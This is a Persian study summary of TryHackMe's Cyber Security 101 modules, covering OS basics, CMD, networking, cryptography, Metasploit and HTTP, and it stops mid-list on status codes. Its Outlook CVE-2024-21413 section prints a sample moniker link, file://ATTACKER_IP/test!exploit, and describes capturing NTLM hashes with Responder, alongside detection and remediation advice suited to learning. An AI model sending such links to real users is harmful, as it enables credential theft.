(مرور کاربردی سرفصلهای رایگان دورهCyber Security 101 (TryHackMe))
این بخش به تشریح مفاهیم پایه امنیت تهاجمی و تبیین متدولوژی تفکر هکرها پرداخته است. در این راستا، یک سناریوی عملی با محوریت کشف صفحات پنهان وب (Hidden Pages) پیادهسازی شد. هدف اصلی این بخش، ایجاد دیدگاه مقدماتی در خصوص نحوه برنامهریزی، طرز فکر مهاجمان و چگونگی هدایت یک حمله سایبری بوده است.
این لایه بر رسالت تیمهای دفاعی مبنی بر پایش (Monitoring) مستمر زیرساختها، تحلیل عمیق تهدیدات و پاسخگویی سریع به حوادث (Incident Response) پیش از بروز خسارت متمرکز است. برخلاف حوزه تهاجمی، تمرکز این بخش بر صیانت و مراقبت از داراییهای دیجیتال است.
سناریوی عملی: یک فعالیت شناسایی وب (Web Discovery) در شبکه رصد شد که بلافاصله از طریق مسدودسازی آدرس آیپی مبدأ (Source IP) در دیوار آتش (Firewall)، اقدامات پیشگیرانه جهت خنثیسازی تکاپوی مهاجم صورت گرفت.
این بخش به اهمیت مکانیزمهای جستجوی پیشرفته و معرفی پایگاههای داده حیاتی در حوزه امنیت پرداخته است:
موتور جستجوی Shodan: معرفی به عنوان ابزار تخصصی پایش و جستجوی تجهیزات اینترنت اشیاء (IoT) و آموزش نحوه بهرهبرداری بهینه از آن.
پلتفرم VirusTotal: تبیین کارکرد این ابزار در راستای تحلیل، اعتبارسنجی و بررسی اصالت (Trust) فایلها و آدرسهای وب (URL) مشکوک.
شناسههای CVE و بانکهای اطلاعاتی آسیبپذیری: تشریح ساختار کدهای CVE جهت ارزیابی ماهیت، نوع خطرات و سطح اهمیت (Severity) آسیبپذیریهای کشفشده.
مستندات رسمی (Manuals) و دستور man: تأکید بر ضرورت رجوع به داکیومنتهای مرجع در گام نخست رفع اشکال؛ به عنوان نمونه استفاده از دستور man در سیستمعامل لینوکس جهت مطالعه راهنمای فنی سرویسها و دستورات.
مخازن Git و GitHub: معرفی گیتهاب به عنوان بستری متنباز (Open-Source) جهت رصد آخرین آسیبپذیریهای روز، اکسپلویتها و تحلیلهای مرتبط با شناسههای CVE.
در قسمت Introduction به مباحث پایه اشاره می کند و علت به وجود امدن و کارایی این سیستم عامل رو توضیح میدهد.
و به نقاط قوت لینوکس از جمله Open-Source بودنش اشاره می کنه. و اینکه نیاز به سخت افزار قوی برای اجرا نداره و به راحتی روی ضعیف ترین سسیستم ها هم قابل راه اندازی است.
سپس به سراغ کامندهای پایه میره و مانند whoami و echo(echo خروجی رو برای ما داخل محیط کامندلاین Return می کنه و whoami اسم کاربری که روی سیستم عامل لاگین کرده رو نشان می دهد).
و در ادامه به دستورات زیر اشاره می کند:
ls: لیست فایل های داخل دایرکتوری رو به ما نشان می دهد.
cd: دستور جا به جا شدن بین دایرکتوری های مختلف(Change Directory)
cat: محتوای فایل متنی رو به ما نشان میدهد.
pwd: دایرکتوری که در حال حاضر در آن قرار داریم رو برای ما پرینت می کند.
سپس به روش های جستوجو فایل و متن اشاره می کند:
find -name test.txt: این دستور به دنبال فایلی با نام test.txt می گردد در بین فایل های دایرکتوری و زیر شاخه آن.
wc: تعداد آیتم های یک فایل رو به عدد اعلام می کند.
grep: یک یا چندین عبارت رو در بین یک یا چندین فایل جستجو می کند.
و سپس به oprator های مهم در ویندوز اشاره می کند.
&: اجرای یک کامند در بکگراند(اجازه می دهد یک دستور زمان بر اجرا بشود و در حین اجرای آن دستورات دیگر نیز اجرا بشود).
&&: اجازه ی ترکیب چند کامند و اجرای همزمان آن را باهم می دهد.
>: محتوا را داخل فایل overwrite می کند.
>>: مانند دستور بالا، با این تفاوت که overwrite نمی کنه و محتوا رو به انتهای فایل اضافه می کند
در تسک اول به Edition های متفاوت ویندوز اشاره می شود، که نسخه های ویندوز متفاوتی برای کاربردهای متفاوت وجود دارد که بر اساس قابلیت هایی که ارائه می دهد هزینه متفاوتی نیز دارد.
در این تسک به نسخه های ویندوز 7,10,11 و ویندوز سرور اشاره می شود.
در تسک دوم به محیط GUI ویندوز اشاره می شود و معرفی کلی از اجزای گرافیکی این محیط صورت می گیرد.
اجزای این بخش که معرفی می شوند عبارت است از:
The Desktop
Start Menu
Search Box (Cortana)
Task View
Taskbar
Toolbars
Notification Area
تسک چهار: در این بخش به مفهوم File System اشاره می شود.
File System: یک سیستم سازمان دهی است که سیستم عامل(ویندوز، مک و...) از آن استفاده می کنند تا مشخص کنند داده ها کجا ذخیره شوند، چگونه خوانده شوند و چگونه نام گذاری گردند.
در این تسک به File System زیر اشاره می گردد:
FAT32 (File Allocation Table 32): یک سیستم فایل قدیمی، ساده و همهفهم است که با تمام دستگاهها (کنسولها، دوربینها، فلشها) سازگاری بینظیری دارد، اما نمیتواند فایل بزرگتر از ۴ گیگابایت را ذخیره کند و امنیت داخلی (مانند رمزگذاری و مجوزدهی) ندارد.
NTFS (New Technology File System): سیستم فایل پیشرفته و استاندارد ویندوزهای امروزی است که از فایلهای بسیار حجیم (تا چندین ترابایت) پشتیبانی کرده، دارای قابلیتهای امنیتی (مجوز دسترسی برای کاربران مختلف)، فشردهسازی و ثبت رویدادها (Journaling) برای جلوگیری از فساد داده هنگام قطع ناگهانی برق است.
در رابطه با قابلیت Permision در NTFSتوضیحاتی داده می شود. انواع سطح دسترسی ها:
Full control
Modify
Read & Execute
List folder contents
Read
Write
تسک 5: در این قسمت به فولدر System32 اشاره می شود.
این دایرکتوری در ویندوز به نوعی حیاتی ترین پوشه در سیستم عامل ویندوز به شمار می رود. این پوشه مرکز نگداری ابزار های حیاتی ویندوز می باشد و در صورتی که این پوشه آسیب ببیند یا حذف شود ویندوز دیگر قادر به بوت شدن نمی باشد.
تسک 6: در این بخش به یوزرها اشاره می شود.
یوزر ها به دو نوع Administrator و Standard تقسیم می شوند.
تسک 7: در این تسک به مفهوم UAC اشاره می شود.
UAC یا همان User Account Control (کنترل حساب کاربری)، یکی از کلیدیترین لایههای امنیتی در ویندوز است که وظیفه دارد جلوی تغییرات غیرمجاز در سیستمعامل را بگیرد.
فلسفه اصلی UAC بسیار ساده است: حتی اگر شما به عنوان کاربر Administrator (مدیر) وارد ویندوز شده باشید، برنامهها به طور پیشفرض با دسترسی یک کاربر استاندارد و محدود اجرا میشوند.
وقتی برنامهای بخواهد کاری انجام دهد که به کل سیستم آسیب بزند یا بخشهای حیاتی (مثل رجیستری، پوشه Windows یا تنظیمات شبکه) را تغییر دهد، UAC وارد عمل میشود و با تاریک کردن صفحه، یک پنجره پاپآپ (Prompt) نشان میدهد تا از شما تاییدیه بگیرد.
تسک 8: در بخش بخش به ابزار Control Panel اشاره می شود.
کنترل پنل (Control Panel) بخش مرکزی در ویندوز است که به عنوان مرکز تنظیمات سیستمعامل و سختافزار عمل میکند. این ابزار به شما اجازه میدهد مواردی مثل حذف برنامهها، مدیریت حسابهای کاربری، تنظیمات شبکه و امنیت سیستم را پیکربندی کنید.
تسک 9: در این تسک به یک ابزار کاربردی ویندوز به نام Task Manager اشاره می شود.
تسک منیجر (Task Manager) ابزار نظارتی و مدیریتی ویندوز است که برنامهها و فرآیندهای در حال اجرا را در لحظه نشان میدهد. این ابزار به شما اجازه میدهد میزان مصرف منابع سیستم (مثل CPU و RAM) را بررسی کنید، برنامههای قفلشده را ببندید و سرویسها را مدیریت کنید.
تسک 2: در این تسک ابزار System Configuration اشاره می شود.
سیستم کانفیگوریشن (System Configuration یا همان msconfig) یک ابزار عیبیابی در ویندوز است که برای مدیریت نحوه بالا آمدن (Boot) سیستم استفاده میشود. این ابزار به شما اجازه میدهد برنامههای استارتاپ، سرویسهای فعال و حالتهای مختلف بوت (مثل Safe Mode) را برای ردیابی و حل مشکلات ویندوز تنظیم کنید.
تسک 4: در این بخش به Computer Management اشاره می شود.
کامپیوتر منیجمنت (Computer Management) مجموعهای از ابزارهای مدیریتی پیشرفته در ویندوز است که برای نظارت و پیکربندی سیستم استفاده میشود.
این ابزار امکان مدیریت هارد دیسکها، مشاهده گزارشهای سیستم (Event Viewer)، مدیریت پوشههای اشتراکی و کنترل کاربران و گروههای محلی را در یک پنجره واحد فراهم میکند.
تسک 5: در این بخش به System Information اشاره می شود.
سیستم اینفورمیشن (System Information یا msinfo32) ابزاری در ویندوز است که مشخصات ریز و گزارشهای کاملی از سختافزار، اجزای سیستم و محیط نرمافزاری ارائه میدهد.
این ابزار به شما کمک میکند تا جزئیات دقیقی مثل مدل پردازنده، مادربرد، میزان رم، وضعیت درایورها و منابع سیستمی را به صورت یکجا و صرفاً جهت مشاهده و عیبیابی بررسی کنید.
تسک 6: در این تسک به Resource Monitor اشاره می شود.
ریسورس مانیتور (Resource Monitor) یک ابزار پیشرفته در ویندوز است که جزئیات دقیق و لحظهای از مصرف منابع اصلی سیستم (CPU، رم، دیسک و شبکه) را نشان میدهد.
این ابزار قابلیتی عمیقتر از تسک منیجر دارد و به شما امکان میدهد اتصالات شبکه فعال، فرآیندهای در حال اجرا و فایلهای درگیر توسط برنامهها را تحلیل کنید.
تسک 7: در این تسک به ابزار Command Prompt در ویندوز اشاره می شود و تعدادی از کامند های کاربردی توضیح داده می شود.
سیامدی (CMD) یا Command Prompt، واسط خط فرمان متنی در ویندوز است که به شما اجازه میدهد بدون استفاده از محیط گرافیکی و مستقیماً با سیستمعامل تعامل داشته باشید.
شما با تایپ کردن دستورات متنی در این محیط میتوانید فایلها را مدیریت کنید، تنظیمات عمیق سیستم را تغییر دهید و کارها را خودکارسازی (Scripting) کنید.
توضیح کوتاه دستورات:
whoami: نام کاربری که در حال حاضر با آن به سیستم لاگین کردهاید و سطح دسترسیها یا گروههای امنیتی شما را نمایش میدهد.
ipconfig: مشخصات کارت شبکه، مثل آدرس آیپی (IP)، سابنت ماسک و گیتوی (Gateway) سیستم شما را نشان میدهد.
manual /?: در ویندوز دستوری به نام manual نداریم (احتمالاً با دستور man در لینوکس متولد شده!)؛ اما ساختار /? سوئیچِ جادویی راهنماست. شما جلوی هر دستوری که /? بگذارید (مثلاً ipconfig /?)، راهنما و طرز استفاده از آن دستور را به شما نشان میدهد.
cls: مخفف Clear Screen است؛ کل صفحه متنی سیامدی را پاک و خلوت میکند تا دوباره از خط اول شروع به تایپ کنید.
netstat: مخفف Network Statistics است؛ تمام اتصالات فعال شبکه، پورتهای باز و ارتباطات اینترنتی کامپیوتر شما با سرورها و سیستمهای دیگر را لیست میکند.
تسک 9: در این بخش به ابزار Registry Editor اشاره می شود.
ابزار Registry Editor که با تایپ دستور regedit اجرا میشود، واسط گرافیکی رسمی و پیشفرض ویندوز است که به شما اجازه میدهد پایگاه داده متمرکز رجیستری را مشاهده، جستجو و ویرایش کنید. از آنجا که فایلهای خام رجیستری ساختار باینری دارند و با متنبازکنهای معمولی قابل خواندن نیستند، این ابزار آنها را به شکل یک ساختار درختی ملموس (شبیه به فایل اکسپلورر) به شما نشان میدهد.
این ابزار دقیقاً مواردی را که در پیام قبلی بررسی کردیم، به شکل زیر سازماندهی و مدیریت میکند:
نمایش کندوها (Hives): در پنل سمت چپ برنامه، ۵ پوشه ریشه و اصلی (مانند HKEY_CURRENT_USER یا HKEY_LOCAL_MACHINE) را میبینید که بالاترین سطح دستهبندی تنظیمات هستند.
مدیریت کلیدها (Keys): پوشهها و زیرپوشههای داخلی که با کلیک روی هر کدام، مسیر دقیق یک تنظیم خاص (مثلاً تنظیمات تسکبار یا فونت سیستم) باز میشود.
تغییر مقادیر (Values): وقتی روی یک کلید (پوشه) کلیک میکنید، دادههای واقعی آن در پنل سمت راست ظاهر میشوند. شما در رجیستری ادیتور میتوانید این مقادیر (متنها، اعداد ۳۲ بیتی یا باینری) را دبلکلیک کرده و برای تغییر رفتار ویندوز، دستکاری کنید.
یک هشدار همیشگی: Registry Editor هیچ دکمهای برای "Save" ندارد! هر تغییری که در مقادیر یا کلیدها ایجاد کنید، همان لحظه اعمال و ذخیره میشود؛ به همین دلیل اشتباه کوچک در آن میتواند سیستم را پایدار ناپذیر کند.
تسک1: رابط گرافیکی (GUI) تنها راه تعامل با سیستمعامل نیست؛ ابزارهای قدرتمند دیگری مانند CMD (خط فرمان) نیز وجود دارند که به شما اجازه میدهند از طریق اجرای دستورات متنی، به صورت مستقیم و عمیقتر با سیستمعامل تعامل داشته باشید.
تسک2: در این بخش دستورات پایه برای کارکردن با ابزار CMD آموزش داده می شود.
set: نمایش، تعریف یا تغییر متغیرهای محیطی (Environment Variables) در ویندوز.
Path=: متغیری که مسیر پوشههای حاوی فایلهای اجرایی را مشخص میکند تا سیستم بتواند بدون نیاز به دانستن آدرس دقیق، آنها را از هر مسیری اجرا کند.
ver: نمایش شماره نسخه (Version) دقیق سیستمعامل ویندوز در حال اجرا.
systeminfo: ارائه یک گزارش جامع و دقیق از مشخصات نرمافزاری و سختافزاری سیستم (مانند زمان روشن بودن، پردازنده و رم).
driverquery: لیست کردن تمامی درایورهای سختافزاری نصبشده روی ویندوز به همراه وضعیت فعال یا غیرفعال بودن آنها.
driverquery | more: نمایش خروجی طولانی دستور درایورها به صورت صفحه به صفحه (تکه تکه)، تا خواندن آن در محیط متنی راحتتر شود.
CTRL + C: یک میانبر کیبورد برای متوقف کردن فوری و اجباری اجرای یک دستور یا فرآیند در حال اجرا در خط فرمان.
help: نمایش لیستی از دستورات داخلی ویندوز به همراه یک توضیح کوتاه برای راهنمایی و آشنایی کاربر.
cls: مخفف Clear Screen؛ تمام متنهای موجود روی صفحه خط فرمان را پاک و محیط را کاملاً خلوت میکند.
تسک 3: عنوان این تسک هست Network TroubleShooting که راه حل هایی برای حل مشکلات Network از طریق ابزار CMD ارائه می دهد.
ipconfig: نمایش اطلاعات پایهای و آدرسهای آیپیِ (IP) کارتهای شبکه متصل به سیستم.
ipconfig /all: نمایش جزئیات کامل و دقیق تمام تنظیمات شبکه، از جمله آدرس مک (MAC)، سرورهای DNS و وضعیت DHCP.
ping target_name: بررسی وضعیت زنده بودن و اتصال شبکه با یک مقصد خاص (سرور یا سایت) و اندازهگیری زمان پاسخدهی (تأخیر).
tracert target_name: ردیابی و نمایش تکتک روترها و گرههایی (Hops) که بستههای داده طی میکنند تا به مقصد نهایی برسند.
nslookup: پرسوجو از سرورهای DNS جهت پیدا کردن آدرس آیپيِ متناظر با یک نام دامنه (یا بالعکس).
netstat: نمایش تمامی اتصالات شبکه فعال، پورتهای باز (Listening) و ارتباطات اینترنتی کامپیوتر در لحظه.
تسک4: در این تسک توضیح داده می شود چگونه از طریق دستورات CMD می شود فایل ها و فضای دیسک را مدیریت کرد.
cd: مخفف Change Directory؛ جهت جابجایی بین پوشهها و تغییر مسیر فعلی در خط فرمان.
dir: نمایش لیست تمام فایلها و پوشههای موجود در دایرکتوری (مسیر) فعلی سیستم.
tree: نمایش ساختار پوشهها و زیرپوشههای یک مسیر به صورت یک نمودار درختی و بصری ملموس.
mkdir: مخفف Make Directory؛ جهت ساخت و ایجاد یک پوشه (فولدر) جدید در مسیر دلخواه.
rmdir: مخفف Remove Directory؛ جهت حذف و پاک کردن یک پوشه (که به طور پیشفرض باید خالی باشد).
copy: کپی کردن یک یا چند فایل از یک مسیر (مبدأ) به مسیر دیگر (مقصد) بدون حذف فایل اصلی.
move: انتقال (کات کردن) فایلها و پوشهها به یک مسیر جدید، یا تغییر نام (Rename) آنها.
del or erase: حذف و پاک کردن یک یا چند فایل مشخصشده از روی هارد دیسک.
تسک 5: در این قسمت در مورد دستورات cmd در باره مانیتورینگ و مدیریت تسک ها اشاره می شود.
tasklist: نمایش لیست تمامی فرآیندها و برنامههای در حال اجرا در سیستم به همراه شماره شناسه (PID) و میزان مصرف حافظه آنها.
tasklist /FI: فیلتر کردن لیست فرآیندهای در حال اجرا بر اساس معیارهای مشخص (مانند وضعیت اجرا، نام فرآیند یا میزان مصرف رم).
taskkill /PID target_pid: بستن و متوقف کردن اجباری یک فرآیند یا برنامه خاص از طریق وارد کردن شماره شناسه (PID) منحصربهفرد آن.
تسک2: در تسک در رابطه با مدل آموزشی OSI توضیح داده می شود. این مدل برای آموزش و درک بهتر مفاهیم شبکه به وجود آماده است که مفهوم شبکه را به 7 لایه مجزا تقسیم می کند.
Physical Layer
Data Link Layer
Network Layer
Transport Layer
Session Layer
Presentation Layer
Application Layer
تسک 3: مدل دیگری وجود دارد به نام TCP/IPکه مانند مدل OSI می باشد با این تفاوت که لایه های 5 تا 7 و لایه های 1 و 2 با هم ترکیب شده اند. این مدل(TCP/IP) جنبه کاربردی تری دارد.
1. Network Access
2. Internet Layer
3. Transport Layer
4. Application Layer
تسک 5: در این تسک در رابطه با مفاهیم IP و Subneting توضیحاتی داده می شود.
IP : آیپی یک شناسه عددی منحصربهفرد است که به هر دستگاه متصل به شبکه اختصاص داده میشود تا هویت و مکان آن مشخص شود. این آدرس دقیقاً مانند کد پستی عمل میکند و به دستگاهها اجازه میدهد در بستر شبکه یکدیگر را پیدا کرده و با هم تبادل داده کنند.
Subnetting: سابنتینگ فرآیند تقسیم کردن یک شبکه بزرگ به چندین شبکه کوچکتر، مجزا و قابل مدیریت به نام سابنت (Subnet) است. این کار با هدف بهبود امنیت، کنترل و کاهش ترافیک شبکه (Broadcast) و استفاده بهینه از آدرسهای آیپی انجام میشود.
تسک 5: در این تسک به دو پروتکل مهم UDP و TCP اشاره می شود.
پروتکل TCP: پروتکل TCP یک پروتکل اتصالگرا (Connection-Oriented) است که تحویل سالم، دقیق و به ترتیب دادهها را به مقصد تضمین میکند. این پروتکل به دلیل بهرهگیری از مکانیزمهای کنترل خطا و تایید دریافت (Handshake)، برای کاربردهای حساسی مثل وبگردی، ایمیل و انتقال فایل استفاده میشود.
پروتکل UDP: پروتکل UDP یک پروتکل بدون اتصال (Connectionless)، سبک و بسیار سریع است که دادهها را بدون بازبینی خطا یا تضمین تحویل، به مقصد میفرستد. این پروتکل به دلیل سرعت بالا و تاخیر کم، برای کاربردهای زنده و آنلاین مانند استریم ویدیو، بازیهای شبکهای و تماسهای تصویری ایدهآل است.
تسک6: در این تسک به مفهوم Encapsulation اشاره می شود.
کپسولهسازی (Encapsulation) در شبکه به فرآیندی گفته میشود که در آن، دادهها هنگام حرکت به سمت پایین در لایههای مدل OSI یا TCP/IP، با اطلاعات کنترلی جدید (مانند هدرها و تریلرها) بستهبندی میشوند. در این فرآیند، هر لایه دادههای دریافت شده از لایه بالاتر را به عنوان بدنه (Payload) خود در نظر گرفته و مشخصات آدرسدهی مربوط به خود (مانند پورت، IP یا MAC Address) را به آن اضافه میکند. این کار تضمین میکند که دادهها ساختار، نظم و امنیت لازم را برای عبور از رسانههای مختلف شبکه حفظ کرده تا در نهایت در مقصد به درستی رمزگشایی و پردازش شوند.
تسک7: در این تسک پروتکل Telnet معرفی می شود.
تلنت (Telnet) یک پروتکل قدیمی شبکه است که به کاربران اجازه میدهد از راه دور به یک سیستم دیگر متصل شده و آن را از طریق خط فرمان مدیریت کنند. از آنجا که این پروتکل تمام دادهها، از جمله نام کاربری و رمز عبور را به صورت متن ساده (Plaintext) و بدون رمزنگاری منتقل میکند، امنیت بسیار پایینی دارد و امروزه جای خود را به پروتکل امن SSH داده است.
تسک 1: این تسک توضیحات کلی درباره موضوع رمزنگاری داده ها می دهد.
رمزنگاری باعث می شود تا اگر دیتا به دست شخصی غیرمجاز بیوفتد همچنان محرمانگی آن حفظ شود و دیتا قابل درک نباشد. با استفاده از این تکنیک می شود جلوی اتک man-in-the-middle را گرفت.
تسک 3: در این تسک به موضوع تبدیل Plaintext به Ciphertext اشاره می شود.
فرآیند رمزنگاری ساده است: دادههای خوانا (Plaintext) با استفاده از یک الگوریتم ریاضی (Cipher) و یک کلید رمزی (Key)، به متنی ناخوانا (Ciphertext) تبدیل میشوند که به این کار Encryption میگویند. برای بازگرداندن اطلاعات به حالت اول یا همان Decryption، داشتن همان الگوریتم و کلید الزامی است؛ در این میان، الگوریتمها معمولاً برای همه آشکارند و این مخفی ماندن کلید است که امنیت ارتباط را تضمین میکند.
تسک5: در این تسک به انواع رمزنگاری ها اشاره می شود.
رمزنگاری متقارن (Symmetric): در این روش از یک کلید یکسان و مشترک برای هر دو فرآیند رمزگذاری و رمزگشایی دادهها استفاده میشود. این سیستم سرعت بسیار بالایی دارد و برای حجم زیادی از اطلاعات مناسب است، اما چالش اصلی آن انتقال امن کلید بین طرفین است.
رمزنگاری نامتقارن (Asymmetric): در این روش از یک جفت کلید مکمل به نامهای کلید عمومی (برای رمزگذاری) و کلید خصوصی (برای رمزگشایی) استفاده میشود. این سیستم مشکل انتقال امن کلید را حل میکند، اما به دلیل محاسبات پیچیده ریاضی، سرعت کمتری نسبت به مدل متقارن دارد.
در این ماژول یکی از بحرانی ترین آسیب پذیری ها بررسی می شود.
این آسیب پذیری مربوط به نرم افزار مایکروسافت Outlook می باشد. این آسیبپذیری به دلیل سادگی در اکسپلویت و شدت بالا، از اهمیت بسیار زیادی در حوزه امنیت برخوردار است.
ماهیت آسیبپذیری (CVE-2024-21413)
شدت خطرات: دارای امتیاز بحرانی CVSS 9.8 است و منجر به نشت اطلاعات احراز هویت (Credential Leak) و در تئوری، اجرای کد از راه دور (RCE) میشود.
مکانیسم اثر: اوتلوک به صورت پیشفرض لینکهای پروتکلهای مختلف را پردازش میکند. این آسیبپذیری زمانی رخ میدهد که اوتلوک یک نوع هایپرلینک خاص به نام Moniker Link را پردازش میکند.
دور زدن Protected View: مهاجم با اضافه کردن کاراکتر خاص علامت تعجب ! به انتهای یک لینک file:// (مثلاً <a href="file://ATTACKER_IP/test!exploit">) میتواند سیستم امنیتی Protected View اوتلوک را به طور کامل دور بزند و برنامه را مجبور کند بدون هیچ هشدار امنیتی، مستقیماً به یک بخش اشتراکی شبکه (SMB) خارجی متصل شود.
نحوه اکسپلویت و سرقت هش (Exploitation)
وقتی قربانی روی این لینک مخرب در ایمیل کلیک میکند، اوتلوک تلاش میکند از طریق پروتکل SMB به سرور مهاجم متصل شود.
سیستم ویندوز قربانی به طور خودکار فرآیند احراز هویت را آغاز کرده و هش netNTLMv2 کاربر را به سمت سرور مهاجم ارسال میکند.
مهاجم با ابزارهایی مانند Responder روی ماشین خود منتظر اتصالات SMB میماند و به محض کلیک کاربر، هش رمز عبور او را شکار (Capture) میکند.
روشهای شناسایی (Detection)
قوانین یارا (YARA Rules): با استفاده از YARA میتوان فایلهای ایمیل (فایلهای .eml) را اسکن کرد و الگوهای مشکوک مانند وجود عبارت file:// در ترکیب با علامت تعجب ! در بخش هایپرلینکها را شناسایی نمود.
تحلیل ترافیک (Wireshark): در صورت وقوع حمله، ترافیک خروجیِ مشکوک روی پورت ۴۴۵ (SMB) به سمت یک آیپي خارجی در کپچرهای وایرشارک کاملاً قابل ردیابی است.
اقدامات اصلاحی و رفع خطرات (Remediation)
بهروزرسانی فوری: از آنجا که این آسیبپذیری مکانیزمهای داخلی اوتلوک را دور میزند، تغییر تنظیماتِ ساده در اوتلوک برای مسدودسازی آن فایدهای ندارد. تنها راهکار قطعی، نصب آپدیتهای امنیتی مایکروسافت (نسخه فوریه ۲۰۲۴ به بعد یا همان Patch Tuesday) است.
کنترلهای شبکه: مسدود کردن ترافیک خروجی SMB (پورت ۴۴۵) به سمت اینترنت در سطح فایروال سازمان، به عنوان یک لایه دفاعی تکمیلی برای جلوگیری از نشت هشها توصیه میشود.
Metasploit: Introduction
تسک1: در این تسک ابزار Metasploit معرفی می شود.
متااسپلویت (Metasploit) یک فریمورک متنباز و بسیار قدرتمند در حوزه امنیت شبکه است که برای تست نفوذ، شناسایی نقاط ضعف و شبیهسازی حملات سایبری به کار میرود. این ابزار به متخصصان امنیت و هکرها اجازه میدهد تا با استفاده از مجموعه وسیعی از اکسپلویتها و پیلودهای آماده، آسیبپذیریهای سیستمها را کشف، تست و ارزیابی کنند.
تسک2: در این تسک به اجزا فریم ورک متا اسپلویت اشاره می شود و کاربردهای آن توضیح داده می شود. و مفاهیم زیر شرح داده می شوند:
Vulnerability آسیبپذیری: همان نقطه ضعف، باگ یا حفره امنیتی در نرمافزار، سختافزار یا شبکه است که راه را برای ورود غیرمجاز یا سوءاستفاده باز میگذارد.
Exploitاکسپلویت: کد، ابزار یا روشی است که هکرها دقیقاً برای سوءاستفاده از یک آسیبپذیری مشخص و نفوذ به سیستم از آن استفاده میکنند.
Payload پیلود: بخش اصلی و مخرب کد است که بعد از نفوذِ موفقِ اکسپلویت، روی سیستم هدف تخلیه و اجرا میشود تا کار نهایی (مثل سرقت دادهها یا گرفتن دسترسی دستوری) را انجام دهد.
تسک2: در این بخش مفاهیم فرانت اند و بک اند بررسی می شود.
فرانت اند: شامل زبان ها و ابزارها و تکنولوژی هایی هست که برای پیاده سازی پوسته سایت استفاده می شود. و کاربر مستتقیم با آن تعامل دارد. مانند:
HTML (Hypertext Markup Language): فوندانسیون یک وب سایت را می سازد.
CSS (Cascading Style Sheets): اعمال استایل به المنت های HTML برای زیباسازی ظاهر سایت.
JS (JavaScript): زبان برنامه نویسی تعاملی وب، با استفاده از این زبان کاربر می تواند با وب سایت تعامل برقرار کند.
بک اند: اتفاقاتی که در بک گراند وب سایت میوفتد بدون اینکه کاربر مستقیما در جریان اتفاقات باشد. شامل موارد و بخش های زیر می باشد:
Database: فضایی که اطلاعات به صورت طبقه بندی در آن ذخیره می شود.
WAF: فایروال وب، که میشود با استفاده از این فناوری ورودی و خروجی دیتا را کنترل کرد.
و دیگر ابزارهای مربوط به زیرساخت وب اپلیکیشن.
تسک 3: در این تسک مفهوم URL بررسی می شود.
URL: یک شناسه منحصربهفرد است که برای آدرسدهی و یافتن منابع مختلف (مانند صفحات وب، تصاویر و فایلها) در شبکه اینترنت استفاده میشود. این نشانی دقیقاً مثل یک آدرس پستی دیجیتال عمل میکند و به مرورگر میگوید که فایل مورد نظر روی کدام سرور قرار دارد و چطور باید آن را باز کند.
اجزای تشکیلدهنده URL:
Scheme: نوع پروتکل ارتباطی را مشخص میکند که نحوه انتقال و تبادل دادهها را تعیین میکند (مانند http یا https).
User: یک بخش اختیاری است که نام کاربری (و گاهی رمز عبور) را برای احراز هویت و دسترسی به منابع امن نشان میدهد.
Host/Domain: نام دامنه یا آدرس آیپی سروری است که فایلها و منبع مورد نظر شما روی آن ذخیره شده است.
Port: شماره درگاهی را روی سرور مشخص میکند که برای برقراری این ارتباطِ بهخصوص باز شده است (مانند پورت 80 یا 443).
Path: مسیر دقیق و آدرس پوشهای را در سرور نشان میدهد که فایل یا صفحه نهایی در آنجا قرار گرفته است.
Query string: پارامترها و دادههای اضافهای است که بعد از علامت سوال میآیند و اطلاعات خاصی را به سرور ارسال میکنند.
Fragment: با علامت هش (#) شروع میشود و مرورگر را مستقیم به بخش یا تیتر خاصی از همان صفحه هدایت میکند.
تسک4: در این بخش ساختار HTTP Message بررسی می شود.
HTTP Message: ساختارهای متنی مشخصی هستند که مرورگر و سرور برای تبادل داده و صحبت با یکدیگر در وب از آنها استفاده میکنند. این پیامها بر اساس جهت حرکتشان، به دو شکلِ درخواست (Request) از سمت کلاینت یا پاسخ (Response) از سمت سرور دستهبندی میشوند.
انواع Message:
HTTP Request: پیامی است که از طرف کلاینت (مانند مرورگر) به سرور ارسال میشود تا درخواستِ باز کردن یک صفحه یا انجام عملیاتی را اعلام کند.
HTTP Response: پیامی است که سرور در پاسخ به کلاینت میفرستد تا وضعیتِ نتیجه (مثل موفقیت یا خطا) و اطلاعات درخواستی را به او بازگرداند.
اجزای تشکیلدهنده پیام:
start line: اولین خط پیام است که در درخواستها نوع متد و آدرس وب، و در پاسخها کد وضعیت (Status Code) سرور را نشان میدهد.
headers : خطوطی شامل اطلاعات تکمیلی و فنی (مثل نوع مرورگر، نوع فایل یا کوکیها) هستند که به پردازش درست پیام کمک میکنند.
empty line : یک سطر کاملاً خالی و اجباری است که مرز بین پایان هدرها و شروع بدنه اصلی پیام را برای سیستم مشخص میکند.
body: بخش پایانی پیام است که دادههای اصلیِ جابجا شده (مانند کدهای HTML وبسایت، تصاویر یا اطلاعات یک فرم) درون آن قرار دارد.
تسک5: در این تسک به انواع متد های request های HTTP اشاره می شود.
GET: برای فتچ کردن دیتا استفاده می شود، بسیار پرکاربرد.
POST: ارسال دیتا به سمت سرور.
PUT: دیتا را آپدیت ممی کند.
DELETE: دیتا را حذف می کنند.
HEAD: مانند GET عمل می کند با این تفاوت که فقط HEADER دیتا را فتچ می کند.
OPTIONS: به ما این اطلاعات را می دهد که کدام متدها مجاز هستند، معمولا برای دیباگ کاربرد دارد.
CONNECT: یک کانکشن امن ایجاد می کند، مانند HTTPS.
تسک6: در این تسک بخش های یک HTTP Request شرح داده می شود.
HTTP Request Header: شامل متادیتا و اطلاعات فنی تکمیلی (مانند نوع مرورگر، کوکیها و فرمت دادهها) است که کلاینت برای راهنمایی سرور در نحوه پردازش درخواست میفرستد.
HTTP Request Body: محتوای اصلی و دادههای خامی (مانند اطلاعات فرم یا فایل JSON) است که کلاینت در متدهایی مثل POST یا PUT برای ذخیره یا پردازش به سرور ارسال میکند.
تسک7: در این تسک به مفهوم Status Code اشاره می شود. Status Code یک عدد سه رقمی است که سرور در پاسخ به کلاینت میفرستد تا نتیجه و وضعیت نهایی انجام درخواست (مانند موفقیت، جابجایی یا بروز خطا) را اعلام کند.
Informational Responses (100-199)
این کدها یعنی سرور بخشی از درخواست را دریافت کرده و منتظر باقی آن است؛ در واقع یک سیگنال «ادامه بده» محسوب میشوند.
Successful Responses (200-299)
این کدها یعنی همهچیز طبق انتظار پیش رفته است؛ سرور درخواست را پردازش کرده و دادههای خواستهشده را بازگردانده است.
Redirection Messages (300-399)
این کدها اعلام میکنند منبعی که درخواست کردهاید به مکان دیگری منتقل شده است و معمولاً آدرس (URL) جدید را در اختیارتان میگذارند.
Client Error Responses (400-499)
